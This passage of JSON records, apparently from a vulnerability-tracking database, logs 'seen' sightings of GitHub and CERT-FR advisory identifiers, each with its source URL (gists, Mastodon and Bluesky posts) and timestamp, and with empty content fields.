"3e5951c4-fca0-45a8-a7b3-c55a484bfdd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9x7f-gwxq-6f2c", "type": "seen", "source": "https://gist.github.com/FuzzysTodd/a25832bda87aee97912ff5c363392c03", "content": "", "creation_timestamp": "2025-03-25T20:45:26.000000Z"}, {"uuid": "8b6f1856-0edc-4322-baec-2c85b96ced5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2q8v-3gqq-4f8p", "type": "seen", "source": "https://gist.github.com/FuzzysTodd/a25832bda87aee97912ff5c363392c03", "content": "", "creation_timestamp": "2025-03-25T20:45:26.000000Z"}, {"uuid": "3b0c6831-1a7e-41bc-8331-9f39c6781a13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2x8x-jmrp-phxw", "type": "seen", "source": "https://gist.github.com/saburi-pp/237b36513b29209ae31133136478b20e", "content": "", "creation_timestamp": "2025-03-04T05:49:27.000000Z"}, {"uuid": "71856d8c-0400-47b7-b5f0-1e871375c6fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-008", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114059338188078617", "content": "", "creation_timestamp": "2025-02-24T14:29:43.799651Z"}, {"uuid": "1dbc22b8-dd2c-4d5b-a56b-7307cc987438", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q298-375f-5q63", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114156928115504442", "content": "", "creation_timestamp": "2025-03-13T20:08:06.603832Z"}, {"uuid": "9bbdede7-67cc-4b3f-b282-78de6a163eb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g9wf-5777-gq43", "type": "seen", "source": "https://gist.github.com/superboy-zjc/a31b8ea7466f91b437598297bf5cbce8", "content": "", "creation_timestamp": "2025-03-19T18:36:44.000000Z"}, {"uuid": "d78eebbe-d6d3-4276-a75f-e501dab9f949", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r8qc-xp3g-c458", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114263311073814161", "content": "", "creation_timestamp": "2025-04-01T15:02:43.736491Z"}, {"uuid": "0df89d81-2b11-4871-abe9-4f158e9e776f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-r8qc-xp3g-c458", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114263311073814161", "content": "", "creation_timestamp": "2025-04-01T15:02:43.738362Z"}, {"uuid": "a8d9062c-6193-4a8e-b6ee-b412d0a30923", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4q56-crqp-v477", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114264388612256212", "content": "", "creation_timestamp": "2025-04-01T19:36:44.027142Z"}, {"uuid": "2223eded-8f51-4266-be46-283daca80f31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4q56-crqp-v477", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114264388612256212", "content": "", "creation_timestamp": "2025-04-01T19:36:44.028557Z"}, {"uuid": "24962e05-1afd-4422-b4e9-07871e1af61a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m72m-mhq2-9p6c", "type": "seen", "source": "https://gist.github.com/safer-bot/fb69a4cda9a7f0b4808b4f12ca5bb304", "content": "", "creation_timestamp": "2025-07-16T05:25:00.000000Z"}, {"uuid": "cb885157-7230-41be-95aa-c6b2bf114695", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-003", "type": "seen", "source": "https://bsky.app/profile/cti-news.bsky.social/post/3llweageulw2s", "content": "", "creation_timestamp": "2025-04-03T16:49:15.172791Z"}, {"uuid": "3da28c12-6713-4c53-8b80-97aa7d2f6d6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/fb69a4cda9a7f0b4808b4f12ca5bb304", "content": "", "creation_timestamp": "2025-07-16T05:25:00.000000Z"}, {"uuid": "907ff88d-5fde-4443-acbf-abfd4297446e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/e9d5252cf350a9514cc3b81edb9d24d8", "content": "", "creation_timestamp": "2025-07-16T09:39:31.000000Z"}, {"uuid": "021e97fc-77b2-41ac-b788-1b10ab5bd8bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/e9d5252cf350a9514cc3b81edb9d24d8", "content": "", "creation_timestamp": "2025-07-16T09:39:31.000000Z"}, {"uuid": "4a7d1daf-d98e-488c-8d73-bbb6670a5e6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/e9d5252cf350a9514cc3b81edb9d24d8", "content": "", "creation_timestamp": "2025-07-16T09:39:31.000000Z"}, {"uuid": "8ef71375-761e-4695-920a-6f4564005105", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/e9d5252cf350a9514cc3b81edb9d24d8", "content": "", "creation_timestamp": "2025-07-16T09:39:31.000000Z"}, {"uuid": "559bb65b-9855-410c-b2b8-58f3bf9d6e8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-557j-xg8c-q2mm", "type": "seen", "source": "https://bsky.app/profile/hn-hot-100.bsky.social/post/3ltjo45mkwu2z", "content": "", "creation_timestamp": "2025-07-09T11:02:45.555497Z"}, {"uuid": "4e95ce0d-744e-4808-96d5-6386a9a0ed71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vgq5-3255-v292", "type": "seen", "source": "https://gist.github.com/safer-bot/73e30ba01b2bab580ce5322378f7dd94", "content": "", "creation_timestamp": "2025-07-16T05:28:57.000000Z"}, {"uuid": "4410069d-db6d-4bc8-8169-05b61dff9e3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g9r-vxhx-9pgx", "type": "seen", "source": "https://gist.github.com/safer-bot/73e30ba01b2bab580ce5322378f7dd94", "content": "", "creation_timestamp": "2025-07-16T05:28:57.000000Z"}, {"uuid": "4b77b903-c27b-407c-996b-f8d726f941c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/73e30ba01b2bab580ce5322378f7dd94", "content": "", "creation_timestamp": "2025-07-16T05:28:57.000000Z"}, {"uuid": "a321052b-b908-4364-b476-f624ce279e9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2017-ALE-002", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgverlo5rc24", "content": "", "creation_timestamp": "2025-01-29T16:20:13.302177Z"}, {"uuid": "5265bfc3-534b-4701-9cf2-d29a02d7d931", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qwp8-x4ff-5h87", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113941997439072239", "content": "", "creation_timestamp": "2025-02-03T21:08:24.968480Z"}, {"uuid": "7e1bf039-635e-4706-9e84-6f5eebbe46af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2018-ALE-007", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvf2eysq224", "content": "", "creation_timestamp": "2025-01-29T16:25:08.132851Z"}, {"uuid": "172faaa5-c0ce-4284-b77f-2a324e1bb82a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-49rv-574x-wgpc", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113947708453042718", "content": "", "creation_timestamp": "2025-02-04T21:20:48.257603Z"}, {"uuid": "d3c26cc8-9188-4d48-ba84-d5a65fecad0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2017-ALE-013", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvev7yxle2t", "content": "", "creation_timestamp": "2025-01-29T16:22:15.137572Z"}, {"uuid": "5bfb0430-98ba-4e5f-9770-6d3cca58cdee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mrpw-gwj7-98r6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113947708468156282", "content": "", "creation_timestamp": "2025-02-04T21:20:48.392161Z"}, {"uuid": "da9846c4-9f9c-4530-a020-9fd451a8649c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g9wf-5777-gq43", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113942024388964254", "content": "", "creation_timestamp": "2025-02-03T21:15:16.223127Z"}, {"uuid": "2a8bb26b-efa0-4d37-9a9d-908338deab85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hw4j-4hg7-22h2", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113947708437450296", "content": "", "creation_timestamp": "2025-02-04T21:20:48.508544Z"}, {"uuid": "fb7d6c50-a3b9-4bd5-b5b5-690649094fa0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2017-ALE-014", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvevkimpv2g", "content": "", "creation_timestamp": "2025-01-29T16:22:26.257504Z"}, {"uuid": "7609dcaa-71f4-40e8-8c7f-1b01d2ff4f49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93q8-gq69-wqmw", "type": "seen", "source": "https://gist.github.com/SavyFrost/a7bbd84d59f72f3c2cfed44779ad0793", "content": "", "creation_timestamp": "2025-01-27T12:33:00.000000Z"}, {"uuid": "04be663f-7fa5-4954-8f2d-42b113e22a7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2017-ALE-015", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvevpbhv52d", "content": "", "creation_timestamp": "2025-01-29T16:22:31.143065Z"}, {"uuid": "9be82d46-1734-4bfb-bbcd-ed5f8c6a39df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2017-ALE-020", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvewi2yke2d", "content": "", "creation_timestamp": "2025-01-29T16:22:57.375734Z"}, {"uuid": "a30cb1e2-1da4-43e3-a3b0-2a0f67c68785", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2018-ALE-006", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgveyue3fm2k", "content": "", "creation_timestamp": "2025-01-29T16:24:17.146710Z"}, {"uuid": "0f084341-3d54-45f2-b4dd-c569853a18db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2018-ALE-001", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvex27pme2i", "content": "", "creation_timestamp": "2025-01-29T16:23:16.273024Z"}, {"uuid": "c0fff30f-a3dd-488b-ad62-264daef3b62d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2018-ALE-002", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvexo7ogf2g", "content": "", "creation_timestamp": "2025-01-29T16:23:38.566988Z"}, {"uuid": "8c4cd28b-fd75-46e9-9c83-c6eee5a84c21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2018-ALE-009", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvf3zgsjt2a", "content": "", "creation_timestamp": "2025-01-29T16:26:03.275079Z"}, {"uuid": "55c16b0a-58ab-4114-ac9d-4052c8cea27a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2018-ALE-003", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvextwsw224", "content": "", "creation_timestamp": "2025-01-29T16:23:43.253400Z"}, {"uuid": "f151119c-22d2-408d-8f52-a45068b63684", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7mfr-774f-w5r9", "type": "seen", "source": "https://gist.github.com/boegelbot/f0d646c73d75e9afc5682b199b9c88fc", "content": "", "creation_timestamp": "2025-01-24T13:32:28.000000Z"}, {"uuid": "34c97eef-2c9a-41f3-b935-64d767e2e85c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2018-ALE-008", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvf3qufrc24", "content": "", "creation_timestamp": "2025-01-29T16:25:54.213478Z"}, {"uuid": "8c04c9e7-3627-475a-9235-7e4851baec1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2018-ALE-010", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvf45bdgf2d", "content": "", "creation_timestamp": "2025-01-29T16:26:07.186322Z"}, {"uuid": "7cbf9528-a018-40c6-8ef1-585c385b2ef3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2022-ALE-005", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvg2fvnqu24", "content": "", "creation_timestamp": "2025-01-29T16:43:02.855621Z"}, {"uuid": "cbcf26ad-24d2-4b9f-8eb3-463988cde5a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3w2c-jfr2-9pg9", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113884286733931596", "content": "", "creation_timestamp": "2025-01-24T16:31:49.442687Z"}, {"uuid": "3e5025e2-d8fd-4f11-83db-493ed480b9d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2022-ALE-006", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvg2njkuj2d", "content": "", "creation_timestamp": "2025-01-29T16:43:10.776170Z"}, {"uuid": "d4dfc3f1-db6e-4e73-8d8f-f7bca720222a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-496v-9q38-2x6c", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113884325135258816", "content": "", "creation_timestamp": "2025-01-24T16:41:35.309179Z"}, {"uuid": "52b8f032-37e8-4984-af14-849d2b31cb40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2022-ALE-007", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvg6ct6qk2k", "content": "", "creation_timestamp": "2025-01-29T16:45:13.851045Z"}, {"uuid": "3c079a65-ffb1-4144-832c-00beb247ed2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xq7-4mgh-gp6w", "type": "seen", "source": "https://infosec.exchange/users/harrysintonen/statuses/113942465890966530", "content": "", "creation_timestamp": "2025-02-03T23:07:32.912864Z"}, {"uuid": "7062f9db-c09d-4f33-9600-982550a029f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9w72-9qww-qj6g", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113884325151720224", "content": "", "creation_timestamp": "2025-01-24T16:41:35.566116Z"}, {"uuid": "d9b2e790-ed9b-476a-8a3f-69bff0a1f6b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2022-ALE-008", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvg6r57nc22", "content": "", "creation_timestamp": "2025-01-29T16:45:28.765107Z"}, {"uuid": "bef7c7c1-8ac7-44b6-97b6-e8b78a746cd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2022-ALE-011", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvg7wdge62d", "content": "", "creation_timestamp": "2025-01-29T16:46:07.774592Z"}, {"uuid": "fedd48e2-d421-48c9-af07-96e9be8f2696", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2022-ALE-012", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvgb7wtt62i", "content": "", "creation_timestamp": "2025-01-29T16:46:51.565108Z"}, {"uuid": "81da2aaa-6325-4442-91ed-31eeaa0c95af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xq7-4mgh-gp6w", "type": "seen", "source": "https://bsky.app/profile/cyrus.wetdry.world.ap.brid.gy/post/3lhfbihowgwd2", "content": "", "creation_timestamp": "2025-02-05T00:04:08.256757Z"}, {"uuid": "cad37d74-036e-4df0-b55a-be63da3a980a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2022-ALE-013", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvgbe44vu24", "content": "", "creation_timestamp": "2025-01-29T16:46:55.772878Z"}, {"uuid": "5eab0b4f-3645-4607-a2fd-be49570e92e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v34r-vj4r-38j6", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113884373877761645", "content": "", "creation_timestamp": "2025-01-24T16:53:59.633615Z"}, {"uuid": "b6d92157-5a4e-4c59-85a2-26aa5cb40506", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2022-ALE-014", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvgbhw56j2t", "content": "", "creation_timestamp": "2025-01-29T16:47:00.279823Z"}, {"uuid": "e4ea9379-0c61-4534-b2cf-576a23f028f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3wwr-3g9f-9gc7", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113884373894073837", "content": "", "creation_timestamp": "2025-01-24T16:53:59.765661Z"}, {"uuid": "40ac1dc2-dfc7-480c-9ab9-8000c1797521", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2023-ALE-015", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvgbpkles2g", "content": "", "creation_timestamp": "2025-01-29T16:47:07.857372Z"}, {"uuid": "7485a0f4-e1ad-43c2-9ba4-6dd4c3b2b428", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2023-ALE-001", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvgccmngg2d", "content": "", "creation_timestamp": "2025-01-29T16:47:27.767995Z"}, {"uuid": "523f037e-960f-49cb-ad8d-01a91443bdd5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3w2c-jfr2-9pg9", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/113884389353887186", "content": "", "creation_timestamp": "2025-01-24T16:57:55.303847Z"}, {"uuid": "31abd148-9c95-4cbc-8cb6-7542e7b57415", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2023-ALE-002", "type": "seen", "source": "https://bsky.app/profile/tuxpanik.bsky.social/post/3lgvgckb3nn2g", "content": "", "creation_timestamp": "2025-01-29T16:47:35.855753Z"}, {"uuid": "e71d9bb8-db26-4ab9-9527-7cc18463d8ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2452-6xj8-jh47", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lgr6zvcaf52k", "content": "", "creation_timestamp": "2025-01-28T00:26:50.588087Z"}, {"uuid": "2bd1e0c0-53bf-4d7f-a442-9fa530c6825d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gf7-ff8x-hq99", "type": "seen", "source": "https://bsky.app/profile/azu.bsky.social/post/3lgr73pfzhe2y", "content": "", "creation_timestamp": "2025-01-28T00:27:51.297038Z"}, {"uuid": "4dddd71c-da42-4387-80ec-038b76410be1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-005", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3lhbwpyxgkh2e", "content": "", "creation_timestamp": "2025-02-03T16:13:24.166122Z"}, {"uuid": "848ed2e3-a025-410a-86f1-4a547ade02ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-005", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lhbwte75zl2l", "content": "", "creation_timestamp": "2025-02-03T16:15:16.511310Z"}, {"uuid": "65f89bf4-748f-48b4-bc79-2a967ffab02b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-005", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/113940844708523152", "content": "", "creation_timestamp": "2025-02-03T16:15:16.860037Z"}, {"uuid": "cb208ff7-1bc5-48dd-9287-cb6f265b98ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9r4c-jwx3-3j76", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113958415485426001", "content": "", "creation_timestamp": "2025-02-06T18:43:44.334363Z"}, {"uuid": "7d152443-5ecb-4fe6-961d-50fd68a982d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4r4m-qw57-chr8", "type": "seen", "source": "https://bsky.app/profile/alesroubicek.indieweb.social.ap.brid.gy/post/3llo62zwmb2o2", "content": "", "creation_timestamp": "2025-03-31T10:40:16.405260Z"}, {"uuid": "8149219e-73ae-439d-accf-bb50c1c67a76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fxrq-fr7h-9rqq", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113901463554547835", "content": "", "creation_timestamp": "2025-01-27T17:20:06.928704Z"}, {"uuid": "05421927-066a-4f6e-b8fa-e1cf7d326ce1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f9c7-7rc3-574c", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113901463569228585", "content": "", "creation_timestamp": "2025-01-27T17:20:07.042899Z"}, {"uuid": "33d3bb8f-c55e-423d-8e2b-0a6c89fbb399", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cr4q-jf47-3645", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113901498998569976", "content": "", "creation_timestamp": "2025-01-27T17:29:07.647028Z"}, {"uuid": "1bf47f2a-0f6d-43ab-a4d6-40ca91c5b76c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ACT-006", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/113980008875615207", "content": "", "creation_timestamp": "2025-02-10T14:15:14.909901Z"}, {"uuid": "e3d718f7-5e72-4a81-a191-dfab42cdb4a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 